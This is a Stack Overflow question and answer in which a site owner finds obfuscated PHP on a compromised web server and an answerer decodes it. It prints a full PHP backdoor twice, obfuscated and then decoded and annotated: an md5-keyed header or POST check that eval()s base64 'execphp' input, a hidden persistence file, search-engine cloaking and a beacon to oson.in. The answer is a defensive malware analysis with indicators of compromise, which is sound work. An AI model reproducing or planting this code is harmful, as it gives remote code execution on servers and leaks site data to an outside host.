How to decrypt/decode this php code? (possible malicious code) -


Hello there, fellow Stack Overflow members; first of all, I hope you are having an amazing day. While going through the files on my web server, I noticed a recent modification date on a few files that I don't remember changing on those dates. Upon inspecting the files, I noticed that several of them had similar code. Sadly it seems obfuscated, and I'm assuming it is malicious, since I did not place it here.

Well, here's the code; if you can provide any insight, great!

http://pastebin.com/qd0bmbxm

The reason I'm posting it on Pastebin is that putting the code inside a code tag produces one huge endless line, since it is unformatted.

Thanks for any advice.

All the information you need is readable in there; you just have to unwrap it bit by bit, like:

pack('H*','6261736536'.'345f6465636f6465') => base64_decode() (the hex bytes, read with the upper-nibble-first 'H*' format, spell out the function name)

base64_decode(substr($junk, 3442, 16)) => preg_replace() base64_decode(substr($junk, 773, 2664)) =>

eval(gzuncompress(base64_decode("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"))); 

=>

// Analyst note: the backdoor as found on the compromised server, still obfuscated. Every
// string constant is hidden behind qqqqo0oq(offset, length), a string-lookup helper whose
// definition is not part of this excerpt; the decoded listing further down on this page
// resolves each call (e.g. qqqqo0oq(19, 20) is "allow_url_fopen", qqqqo0oq(126, 0) is "").
// Control flow is the same as in the decoded listing: build the current URL, derive an
// md5 key, answer a "y_auth"-authenticated request by eval()ing base64-decoded POST data,
// otherwise include_once a hidden marker file or beacon to the first host in $iillil.
// The page was scraped in lowercase, so $_server, $_get, $_post, php_os and curlopt_*
// stand for $_SERVER, $_GET, $_POST, PHP_OS and CURLOPT_*; the foreach loops lost "as".
if (!defined("determinator")){ function determinator_feof($qq00q0, &$iiill1 = null) { $iiill1 = microtime(true); return feof($qq00q0); } function getfile($il1i1i, $q0ooqo){ $i11iil = qqqqo0oq(2, 6); $q0oqoq = $i11iil.qqqqo0oq(11, 7); @ini_set(qqqqo0oq(19, 20), 1); if (@ini_get(qqqqo0oq(19, 20)) == qqqqo0oq(41, 2)) { $q0qo0q=@file_get_contents(qqqqo0oq(46, 10) . $il1i1i . $q0ooqo. qqqqo0oq(59, 30)); return $q0qo0q; } elseif (function_exists($q0oqoq)){ $i1il1i = @$q0oqoq(); $i1illi = $i11iil.qqqqo0oq(90, 10); $q0qqqq = $i11iil.qqqqo0oq(101, 7); @$i1illi($i1il1i, curlopt_url, qqqqo0oq(46, 10) . $il1i1i . $q0ooqo. qqqqo0oq(111, 12)); @$i1illi($i1il1i, curlopt_header,false); @$i1illi($i1il1i, curlopt_returntransfer,true); @$i1illi($i1il1i, curlopt_connecttimeout, 5); $ii1i11 = @$q0qqqq($i1il1i); @curl_close($i1il1i); if (empty($ii1i11)){$ii1i11 = qqqqo0oq(126, 0);} return $ii1i11; } else { $qq00q0 = @fsockopen($il1i1i, 80, $il1i1l, $ill1i1, 5); if ($qq00q0) { $qqq0o0 = qqqqo0oq(126, 0); $iiill1 = null; @fputs($qq00q0, "get {$q0ooqo}&way=socket http/1.0\r\nhost: {$il1i1i}\r\n"); $q0q0qq = php_os.qqqqo0oq(130, 2).php_version; @fputs($qq00q0, "user-agent: {$q0q0qq}\r\n\r\n"); while(!determinator_feof($qq00q0, $iiill1) && (microtime(true) - $iiill1) < 2){ $qqq0o0 .= @fgets($qq00q0, 128); } @fclose($qq00q0); $q0oqo0 = explode("\r\n\r\n", $qqq0o0); unset($q0oqo0[0]); return implode("\r\n\r\n", $q0oqo0); } } } $iillil = array(qqqqo0oq(133, 10), qqqqo0oq(147, 19), qqqqo0oq(169, 15)); function write($il1lli,$ill1li){ if ($q0qooo=@fopen($il1lli,qqqqo0oq(185, 2))){ @fwrite($q0qooo,$ill1li); @fclose($q0qooo); } } function output($q00qq0, $qq00oq){ echo qqqqo0oq(191, 3).$q00qq0.qqqqo0oq(199, 2).$qq00oq."\r\n"; } @ini_set(qqqqo0oq(203, 19), 0); define(qqqqo0oq(225, 16), 1); $iilili=qqqqo0oq(241, 7); $qo0oo0=qqqqo0oq(249, 6); $q0qo0o=qqqqo0oq(255, 23); $qqo0qo=qqqqo0oq(281, 18); $iliil1=qqqqo0oq(302, 18); $il1i1i=qqqqo0oq(46, 10); if (isset($_server[qqqqo0oq(321, 7)])){ if 
(@$_server[qqqqo0oq(321, 7)] != qqqqo0oq(329, 4)){ $il1i1i=qqqqo0oq(334, 11); } } $il1i1i.=strtolower(@$_server[qqqqo0oq(345, 12)]); foreach ($_get $q00qq0=>$qq00oq){ if (strpos($qq00oq,qqqqo0oq(359, 7))){$_get[$q00qq0]=qqqqo0oq(126, 0);} elseif (strpos($qq00oq,qqqqo0oq(371, 8))){$_get[$q00qq0]=qqqqo0oq(126, 0);} } if(!isset($_server[qqqqo0oq(383, 15)])) { $_server[qqqqo0oq(383, 15)] = @$_server[qqqqo0oq(398, 15)]; if(@$_server[qqqqo0oq(415, 16)]) { $_server[qqqqo0oq(383, 15)] .= qqqqo0oq(434, 2) . @$_server[qqqqo0oq(415, 16)]; } } if ($qo0oqq=$il1i1i.@$_server[qqqqo0oq(383, 15)]){ $qoqoo0=@md5($il1i1i.$qo0oo0.php_os.$q0qo0o); $iil111=dirname(__file__).directory_separator; $qoo00o = array( qqqqo0oq(439, 11), qqqqo0oq(450, 20), qqqqo0oq(473, 19), @$_server[qqqqo0oq(493, 4)], @$_server[qqqqo0oq(497, 6)], @$_env[qqqqo0oq(493, 4)], @$_env[qqqqo0oq(503, 8)], @$_env[qqqqo0oq(497, 6)], qqqqo0oq(514, 6), @ini_get(qqqqo0oq(523, 19)), $iil111.qqqqo0oq(542, 4), $iil111.qqqqo0oq(549, 24), $iil111.qqqqo0oq(574, 22), ); foreach ($qoo00o $qqq0qq){ if (!empty($qqq0qq)){ $qqq0qq.=directory_separator; if (@is_writable($qqq0qq)){ $iil111 = $qqq0qq; break; } } } $tmp=$iil111.qqqqo0oq(597, 2).$qoqoo0; if (@$_server["http_y_auth"]==$qoqoo0 or @$_post["y_auth"]==$qoqoo0){ echo "\r\n"; @output(qqqqo0oq(599, 8), $qo0oo0.qqqqo0oq(609, 2).$iilili.qqqqo0oq(611, 6)); if ($illi11=$qqo0qo(@$_post[qqqqo0oq(617, 10)])){ @eval($illi11); echo "\r\n"; @output(qqqqo0oq(629, 4), qqqqo0oq(634, 3)); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $qo0oqq=@urlencode($qo0oqq); $i11ill = @strtolower(@$_server[qqqqo0oq(643, 20)]); foreach (explode(qqqqo0oq(665, 2), qqqqo0oq(669, 55)) $i1111l){ if (strpos($i11ill, $i1111l)!==false){ if (@touch($tmp)){ $q0ooqo = qqqqo0oq(727, 14).$qo0oqq.qqqqo0oq(742, 4).$qoqoo0.qqqqo0oq(749, 12).$iilili.qqqqo0oq(767, 4).$qo0oo0; $i1l1li = getfile($iillil[0], $q0ooqo); @touch($tmp); } break; } } } } } 

// Analyst note: decoded form of the obfuscated listing above, with every qqqqo0oq(offset,
// length) call replaced by the string it resolves to. Indicators visible in this listing:
//   - remote hosts "oson.in", "ryanecasey.com", "phpaide.com" (only "oson.in" is contacted here);
//   - request header "Y-Auth" or POST field "y_auth" used as the access token;
//   - POST field "execphp", whose base64-decoded content is passed to eval();
//   - response lines "y_versio:2.20-ftp13-php" and "y_out:ok";
//   - a hidden marker file "." + 32 hex chars in one of the 13 directories listed below;
//   - an outbound request to "oson.in/pg.php?u=...&k=...&t=php&p=ftp13&v=2.20" that is only
//     made when the User-Agent contains a search-engine crawler name (cloaking).
// The page was scraped in lowercase, so $_server, $_get, $_post, $_env, php_os, php_version,
// __file__, directory_separator and curlopt_* stand for their upper-case PHP names, and the
// foreach statements lost their "as" keyword; the tokens are kept as scraped.
if(!defined("determinator")) {
    // feof() wrapper that also stores the current time in $iiill1_time_by_ref; getfile()'s
    // socket branch uses that timestamp as a 2-second deadline for its read loop.
    function determinator_feof($qq00q0_feof_resource, &$iiill1_time_by_ref = null)
    {
        $iiill1_time_by_ref = microtime(true);
        return feof($qq00q0_feof_resource);
    }

    // Fetches "http://" . $il1i1i_hostname . $q0ooqo_url_file over plain HTTP, trying
    // file_get_contents(), then curl, then a raw socket. Each branch appends "&way=<method>"
    // to the query string, so the remote side learns which transport worked. Returns the
    // response body (or "" / null when every transport fails).
    function getfile($il1i1i_hostname, $q0ooqo_url_file)
    {
        // Leftovers of the obfuscated version, which assembled function names from pieces;
        // the decoded code below calls curl_* directly and never reads these.
        $i11iil = "curl";
        $q0oqoq = "curl_init";
        // allow_url_fopen is a PHP_INI_SYSTEM setting, so this ini_set() is normally
        // ineffective; the first branch only runs where the server already allows it.
        @ini_set("allow_url_fopen", 1);
        if (@ini_get("allow_url_fopen") == "1")
        {
            $remote_content=@file_get_contents("http://" . $il1i1i_hostname . $q0ooqo_url_file . "&way=file_get_contents");
            return $remote_content;
        }
        elseif (function_exists("curl_init"))
        {
            $curl_handler = @curl_init();
            $i1illi = "curl_setopt";
            $q0qqqq = "curl_exec";
            @curl_setopt($curl_handler, curlopt_url, "http://" . $il1i1i_hostname . $q0ooqo_url_file . "&way=curl");
            @curl_setopt($curl_handler, curlopt_header,false);
            @curl_setopt($curl_handler, curlopt_returntransfer,true);
            @curl_setopt($curl_handler, curlopt_connecttimeout, 5);
            $remote_content = @curl_exec($curl_handler);
            @curl_close($curl_handler);
            if (empty($remote_content))
            {
                $remote_content = "";
            }
            return $remote_content;
        }
        else
        {
            // Hand-rolled HTTP/1.0 GET on port 80 with a 5-second connect timeout; the
            // User-Agent it sends is "<PHP_OS>/<PHP_VERSION>", which is itself a detectable
            // signature in outbound proxy logs.
            $socket_resource = @fsockopen($il1i1i_hostname, 80, $il1i1l, $ill1i1, 5);
            if ($socket_resource)
            {
                $qqq0o0 = "";
                $iiill1 = null;
                @fputs($socket_resource, "get {$q0ooqo_url_file}&way=socket http/1.0\r\nhost: {$il1i1i_hostname}\r\n");
                $q0q0qq = php_os."/".php_version;
                @fputs($socket_resource, "user-agent: {$q0q0qq}\r\n\r\n");
                // Read until EOF or until 2 seconds have passed since the last feof() check.
                while(!determinator_feof($socket_resource, $iiill1) && (microtime(true) - $iiill1) < 2)
                {
                    $qqq0o0 .= @fgets($socket_resource, 128);
                }
                @fclose($socket_resource);
                // Drop the response headers (everything before the first blank line).
                $q0oqo0 = explode("\r\n\r\n", $qqq0o0);
                unset($q0oqo0[0]);
                return implode("\r\n\r\n", $q0oqo0);
            }
        }
    }

    // Remote hosts used by the backdoor; only $iillil[0] ("oson.in", inlined below) is
    // contacted in this listing, the other two are candidates for blocking/log searches.
    $iillil = array("oson.in", "ryanecasey.com", "phpaide.com");

    // Overwrites $il1lli_local_file with $ill1li_data_to_write. Defined but never called in
    // this listing; presumably used by code loaded later (e.g. from the marker file).
    function write($il1lli_local_file, $ill1li_data_to_write)
    {
        if ($q0qooo_local_file_handler=@fopen($il1lli_local_file, "w"))
        {
            @fwrite($q0qooo_local_file_handler, $ill1li_data_to_write);
            @fclose($q0qooo_local_file_handler);
        }
    }

    // Emits one "y_<key>:<value>\r\n" line; these lines mark responses from the backdoor.
    function output($q00qq0, $qq00oq)
    {
        echo "y_".$q00qq0.":".$qq00oq."\r\n";
    }

    @ini_set("display_errors", 0);
    define("determinator", 1);
    // Build tag, version, and fixed salt; the decoded code inlines these literals further
    // down, so the variables themselves are unused here. $qqo0qo/$iliil1 name the decoder
    // and encoder the obfuscated version called by variable.
    $iilili="ftp13";
    $qo0oo0="2.20";
    $q0qo0o="iiiiiliil1111l1il";
    $qqo0qo="base64_decode";
    $iliil1="base64_encode";
    $il1i1i_url_domain_and_protocol="http://";

    // Reconstruct scheme + host of the current request.
    if(isset($_server["https"]))
    {
        if(@$_server["https"] != "off")
        {
            $il1i1i_url_domain_and_protocol="https://";
        }
    }

    $il1i1i_url_domain_and_protocol.=strtolower(@$_server["http_host"]);

    // Blanks any GET value containing "union" or "select" — a crude attempt to keep other
    // SQL-injection probes off the host. strpos() is used as a boolean here, so a match at
    // offset 0 is not caught.
    foreach ($_get $q00qq0_get_key=>$qq00oq_get_value)
    {
        if(strpos($qq00oq_get_value, "union"))
        {
            $_get[$q00qq0_get_key]="";
        }
        elseif (strpos($qq00oq_get_value, "select"))
        {
            $_get[$q00qq0_get_key]="";
        }
    }
    // Fallback for SAPIs that do not populate REQUEST_URI.
    if(!isset($_server["request_uri"]))
    {
        $_server["request_uri"] = @$_server["script_name"];
        if(@$_server["query_string"])
        {
            $_server["request_uri"] .= "?" . @$_server["query_string"];
        }
    }
    if ($qo0oqq_url=$il1i1i_url_domain_and_protocol.@$_server["request_uri"])
    {
        // Per-host key: md5(scheme+host . version . PHP_OS . salt). It is stable for a given
        // site and doubles as the access token (compared below) and the marker file name,
        // so a responder can recompute it to locate the marker file.
        $qoqoo0_temp_file_name=@md5($il1i1i_url_domain_and_protocol."2.20".php_os."iiiiiliil1111l1il");
        $iil111_curent_dir=dirname(__file__).directory_separator;
        // 13 candidate directories for the marker file; the first writable one wins,
        // otherwise the script's own directory is used. The last two are WordPress paths.
        $qoo00o_temp_dir_list = array(
            "/dev/shm",
            "/tmp/.font-unix",
            "/tmp/.ice-unix",
            @$_server["tmp"],
            @$_server["temp"],
            @$_env["tmp"],
            @$_env["tmpdir"],
            @$_env["temp"],
            "/tmp",
            @ini_get("upload_tmp_dir"),
            $iil111_curent_dir."tmp",
            $iil111_curent_dir."wp-content/uploads",
            $iil111_curent_dir."wp-content/cache",
            );
        foreach ($qoo00o_temp_dir_list $qqq0qq_current_temp_dir)
        {
            if (!empty($qqq0qq_current_temp_dir))
            {
                $qqq0qq_current_temp_dir.=directory_separator;
                if (@is_writable($qqq0qq_current_temp_dir))
                {
                    $iil111_curent_dir = $qqq0qq_current_temp_dir;
                    break;
                }
            }
        }

        // Hidden marker/payload file: "<dir>/.<md5>".
        $tmp=$iil111_curent_dir . "." . $qoqoo0_temp_file_name;

        // Operator access: a request carrying the key in the Y-Auth header or the y_auth
        // POST field gets the version banner and, if an "execphp" POST field is present, its
        // base64-decoded content is executed with eval(). This is the remote-code-execution
        // path; the "==" comparison and the "@" suppressions are the author's.
        if(@$_server["http_y_auth"]==$qoqoo0_temp_file_name or @$_post["y_auth"]==$qoqoo0_temp_file_name)
        {
            echo "\r\n";
            @output("versio", "2.20" . "-" . "ftp13" . "-php");
            if ($illi11_remote_php_code=base64_decode(@$_post["execphp"]))
            {
                @eval($illi11_remote_php_code);
                echo "\r\n";
                @output("out", "ok");
            }
            exit(0);
        }
        // Persistence: whatever PHP is stored in the marker file runs on every request;
        // touch() refreshes its mtime so cleanup-by-age does not remove it.
        if (@is_file($tmp))
        {
            @touch($tmp);
            @include_once($tmp);
        }
        else
        {
            // Crawler cloaking: only when the User-Agent names a search engine is the marker
            // file created and a beacon sent to oson.in with the page URL, the key, the build
            // tag and the version. The reply is stored in $i1l1li but not used in this listing
            // (nothing here writes it to $tmp).
            $qo0oqq_url=@urlencode($qo0oqq_url);
            $i11ill = @strtolower(@$_server["http_user_agent"]);
            foreach (explode(",", "google,yahoo,bing,msnbot,ask,baidu,yandex") $i1111l)
            {
                if (strpos($i11ill, $i1111l)!==false)
                {
                    if (@touch($tmp))
                    {
                        $q0ooqo_url2 = "/pg.php?u=" . $qo0oqq_url . "&k=" . $qoqoo0_temp_file_name . "&t=php&p=" . "ftp13" . "&v=" . "2.20";
                        $i1l1li = getfile("oson.in", $q0ooqo_url2);
                        @touch($tmp);
                    }
                    break;
                }
            }
        }
    }
}

It's an interface / backdoor: it logs data to an external server and allows the "master" to send PHP code and have it executed on the server.

It also saves more PHP in temp files, in one of the 13 temp folders it tries to write to.

